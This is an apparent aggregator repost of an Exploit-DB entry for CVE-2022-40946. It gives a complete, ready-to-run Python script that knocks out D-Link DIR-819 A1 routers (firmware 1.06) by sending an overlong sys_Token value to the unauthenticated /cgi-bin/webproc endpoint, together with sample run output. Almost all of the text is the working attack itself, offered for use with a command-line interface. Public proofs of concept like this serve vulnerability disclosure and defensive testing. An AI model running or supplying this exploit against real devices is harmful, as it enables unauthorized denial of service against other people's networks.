4
[dos] DLink DIR 819 A1 - Denial of Service
source link: https://www.exploit-db.com/exploits/51053
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
DLink DIR 819 A1 - Denial of Service
Exploit:
/
# Exploit Title: DLink DIR 819 A1 - Denial of Service
# Date: 30th September, 2022
# Exploit Author: @whokilleddb (https://twitter.com/whokilleddb)
# Vendor Homepage: https://www.dlink.com/en/products/dir-819-wireless-ac750-dual-band-router
# Version: DIR-819 (Firmware Version : 1.06 Hardware Version : A1)
# Tested on: Firmware Version - 1.06 Hardware Version - A1
# CVE : CVE-2022-40946
#
# Github: https://github.com/whokilleddb/dlink-dir-819-dos
#
# $ ./exploit.py -i 192.168.0.1
# [+] DLink DIR-819 DoS exploit
# [i] Address to attack: 192.168.0.1
# [i] Using SSL: False
# [i] Request Timeout: 30s
# [i] Buffer Length: 19
# [i] Payload: http://192.168.0.1/cgi-bin/webproc?getpage=html/index.html&errorpage=html/error.html&var:language=en_us&var:menu=basic&var:page=Bas_wansum&var:sys_Token=6307226200704307522
# [+] Exploit Successful!
#!/usr/bin/env python3
import sys
import string
import urllib3
import requests
import argparse
import random
import socket
from rich import print
# Disable SSL Warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Globals
TIMEOUT = 30
#BUFFER_LEN = 19
BUFFER_LEN = 32
# Class to exploit
class Exploit:
def __init__(self, ip, is_ssl):
"""Initialize the constructor"""
self.ip = ip
self.is_ssl = is_ssl
_payload = f"{self.ip}/cgi-bin/webproc?getpage=html/index.html&errorpage=html/error.html&var:language=en_us&var:menu=basic&var:page=Bas_wansum&var:sys_Token={''.join(x for x in random.choices(string.digits, k=BUFFER_LEN))}"
if self.is_ssl:
self.payload = f"https://{_payload}"
else:
self.payload = f"http://{_payload}"
def show(self):
"""Show the parameters"""
print(f"[bold][[cyan]i[/cyan]] Address to attack: [green]{self.ip}[/green][/bold]")
print(f"[bold][[cyan]i[/cyan]] Using SSL: [green]{self.is_ssl}[/green][/bold]")
print(f"[bold][[cyan]i[/cyan]] Request Timeout: [green]{TIMEOUT}s[/green][/bold]")
print(f"[bold][[cyan]i[/cyan]] Buffer Length: [green]{BUFFER_LEN}[/green][/bold]")
print(f"[bold][[cyan]i[/cyan]] Payload: [green]{self.payload}[/green][/bold]")
def run(self):
"""Run the exploit"""
print(f"[bold][[magenta]+[/magenta]] DLink DIR-819 DoS exploit[/bold]")
self.show()
try:
r = requests.get(self.payload, verify=False, timeout=TIMEOUT)
if "Internal Error" in r.text:
print(f"[bold][[green]+[/green]] Exploit Successful![/bold]")
print(f"[bold][[green]+[/green]] Router services must be down![/bold]")
else:
print(f"[bold][[red]![/red]] Exploit Failed :([/bold]")
except requests.exceptions.Timeout:
print(f"[bold][[green]+[/green]] Exploit Successful![/bold]")
except Exception as e:
print(f"Error occured as: {e}")
def main():
"""Main function to run"""
parser = argparse.ArgumentParser(
description="DLink DIR-819 Unauthenticated DoS")
parser.add_argument('-i', '--ip', required=True, help="IP of the router")
parser.add_argument('-s', '--ssl', required=False, action="store_true")
opts = parser.parse_args()
try:
ip = socket.gethostbyname(opts.ip)
except socket.error:
print("[bold red][!] Invalid IP address[/bold red]", file=sys.stderr)
return
is_ssl = opts.ssl
exploit = Exploit(ip, is_ssl)
exploit.run()
if __name__ == '__main__':
main()
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK